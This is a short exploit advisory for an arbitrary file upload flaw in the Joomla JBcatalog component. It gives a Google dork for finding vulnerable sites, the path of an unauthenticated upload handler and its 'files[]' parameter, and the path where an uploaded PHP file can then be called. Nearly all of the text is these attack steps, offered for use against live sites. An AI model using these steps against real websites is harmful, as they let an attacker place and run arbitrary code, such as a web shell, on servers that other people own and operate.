Joomla Component JBcatalog - Arbitrary File Upload

# Exploit Title: Joomla Component JBcatalog - Arbitrary File Upload
# Google Dork: inurl:/components/com_jbcatalog/
# Date: 16 December 2017 (Indonesia)
# Exploit Author: AlHikam0x
# Tested on: Ubuntu

Proof of Concept
1. Check Vulnerability.
https://web-target/[path]/components/com_jbcatalog/libraries/jsupload/server/php/
View image : Disini

2. Array type Upload : files[]
CSRF Online
3. Check file uploaded. https://web-target/com_jbcatalog/libraries/jsupload/server/php/files/file.php